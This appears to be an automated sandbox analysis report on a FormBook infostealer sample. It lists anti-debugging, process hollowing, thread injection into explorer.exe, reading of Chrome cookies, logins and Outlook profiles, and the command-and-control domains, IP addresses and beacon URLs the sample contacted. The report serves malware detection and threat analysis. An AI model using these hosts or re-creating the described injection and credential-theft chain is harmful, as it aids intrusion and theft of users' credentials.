Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEA70E mov eax, dword ptr fs:[00000030h] 3_2_00AEA70E
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B4FF10 mov eax, dword ptr fs:[00000030h] 3_2_00B4FF10
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B4FF10 mov eax, dword ptr fs:[00000030h] 3_2_00B4FF10
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B8070D mov eax, dword ptr fs:[00000030h] 3_2_00B8070D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B8070D mov eax, dword ptr fs:[00000030h] 3_2_00B8070D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADF716 mov eax, dword ptr fs:[00000030h] 3_2_00ADF716
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACFF60 mov eax, dword ptr fs:[00000030h] 3_2_00ACFF60
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B88F6A mov eax, dword ptr fs:[00000030h] 3_2_00B88F6A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACEF40 mov eax, dword ptr fs:[00000030h] 3_2_00ACEF40
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0040C317 LdrLoadDll, 3_2_0040C317
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040AB9E SetUnhandledExceptionFilter, 1_2_0040AB9E
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040AE6C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0040AE6C
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040AA3F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040AA3F
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040F790 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040F790

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.patrickguarte.com
Source: C:\Windows\explorer.exe Network Connect: 155.159.61.221 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.eufidelizo.com
Source: C:\Windows\explorer.exe Network Connect: 192.185.35.86 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.lyonfinancialusa.com
Source: C:\Windows\explorer.exe Domain query: www.afterdarksocial.club
Source: C:\Windows\explorer.exe Domain query: www.lopezmodeling.com
Source: C:\Windows\explorer.exe Network Connect: 192.185.217.47 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 206.233.197.135 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.22.100.62 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.214.129.149 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.foxwhistle.com
Source: C:\Windows\explorer.exe Network Connect: 2.57.90.16 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.brennancorps.info
Source: C:\Windows\explorer.exe Domain query: www.19t221013d.tokyo
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Section unmapped: C:\Windows\SysWOW64\help.exe base address: 110000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Thread register set: target process: 3528 Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Thread register set: target process: 3528 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Process created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h Jump to behavior
Source: explorer.exe, 00000004.00000000.313440490.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341395236.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.360349576.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: EProgram Managerzx
Source: explorer.exe, 00000004.00000000.313440490.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341395236.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.318601390.0000000005C70000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.313440490.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341395236.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.360349576.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.313026823.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.360055157.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.341089445.00000000009C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progmanath
Source: explorer.exe, 00000004.00000000.313440490.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341395236.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.360349576.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040ACAB cpuid 1_2_0040ACAB
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040A928 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_0040A928
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040324F

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\help.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 756323 Sample: Lc8xQv8iZY.exe Startdate: 30/11/2022 Architecture: WINDOWS Score: 100 35 Snort IDS alert for network traffic 2->35 37 Multi AV Scanner detection for domain / URL 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 5 other signatures 2->41 9 Lc8xQv8iZY.exe 19 2->9         started        process3 file4 27 C:\Users\user\AppData\Local\...\hvbvmxm.exe, PE32 9->27 dropped 12 hvbvmxm.exe 1 9->12         started        process5 signatures6 53 Multi AV Scanner detection for dropped file 12->53 55 Machine Learning detection for dropped file 12->55 57 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 12->57 59 Maps a DLL or memory area into another process 12->59 15 hvbvmxm.exe 12->15         started        18 conhost.exe 12->18         started        process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 20 explorer.exe 15->20 injected process9 dnsIp10 29 www.afterdarksocial.club 162.214.129.149, 49698, 49699, 80 UNIFIEDLAYER-AS-1US United States 20->29 31 eufidelizo.com 192.185.217.47, 49695, 80 UNIFIEDLAYER-AS-1US United States 20->31 33 9 other IPs or domains 20->33 43 System process connects to network (likely due to code injection or exploit) 20->43 24 help.exe 13 20->24         started        signatures11 process12 signatures13 45 Tries to steal Mail credentials (via file / registry access) 24->45 47 Tries to harvest and steal browser information (history, passwords, etc) 24->47 49 Modifies the context of a thread in another process (thread injection) 24->49 51 Maps a DLL or memory area into another process 24->51
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
192.185.217.47
 eufidelizo.com United States
46606 UNIFIEDLAYER-AS-1US true
206.233.197.135
 www.lyonfinancialusa.com United States
174 COGENT-174US true
155.159.61.221
 www.patrickguarte.com South Africa
137951 CLAYERLIMITED-AS-APClayerLimitedHK true
154.22.100.62
 www.foxwhistle.com United States
174 COGENT-174US true
162.214.129.149
 www.afterdarksocial.club United States
46606 UNIFIEDLAYER-AS-1US true
2.57.90.16
 brennancorps.info Lithuania
47583 AS-HOSTINGERLT true
192.185.35.86
 lopezmodeling.com United States
46606 UNIFIEDLAYER-AS-1US true

Contacted Domains

Name IP Active
www.patrickguarte.com 155.159.61.221 true
brennancorps.info 2.57.90.16 true
lopezmodeling.com 192.185.35.86 true
www.foxwhistle.com 154.22.100.62 true
eufidelizo.com 192.185.217.47 true
www.lyonfinancialusa.com 206.233.197.135 true
www.afterdarksocial.club 162.214.129.149 true
www.eufidelizo.com unknown unknown
www.brennancorps.info unknown unknown
www.19t221013d.tokyo unknown unknown
www.lopezmodeling.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.lyonfinancialusa.com/henz/ true
  • Avira URL Cloud: malware
 unknown
http://www.lopezmodeling.com/henz/ true
  • Avira URL Cloud: malware
 unknown
http://www.brennancorps.info/henz/ true
  • Avira URL Cloud: malware
 unknown
http://www.afterdarksocial.club/henz/ true
  • Avira URL Cloud: malware
 unknown
www.brennancorps.info/henz/ true
  • Avira URL Cloud: malware
 low
http://www.brennancorps.info/henz/?4hq=P4ST2IJPckjMYpRf2FLdq0axEROKy7OOggEf6mHPhnME1yGBMW0egmkxYDI06dmXm7z7OVgXWzJ+YqSrULYkiycbwQA+qKMVmQ==&o8=wR-h28Gxg true
  • Avira URL Cloud: malware
 unknown
http://www.foxwhistle.com/henz/ true
  • Avira URL Cloud: malware
 unknown
http://www.eufidelizo.com/henz/?4hq=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&o8=wR-h28Gxg true
  • Avira URL Cloud: malware
 unknown
http://www.lopezmodeling.com/henz/?4hq=dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp0vSyI4bn1RZjePkdeS9augOMgWVykt+ztx1R3MJW/gsn5nuFARzMtUktTfqb4tJ3+A==&o8=wR-h28Gxg true
  • Avira URL Cloud: malware
 unknown
http://www.patrickguarte.com/henz/ true
  • Avira URL Cloud: malware
 unknown
http://www.patrickguarte.com/henz/?4hq=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYcUTUl/8YIp7EDwQ==&o8=wR-h28Gxg true
  • Avira URL Cloud: malware
 unknown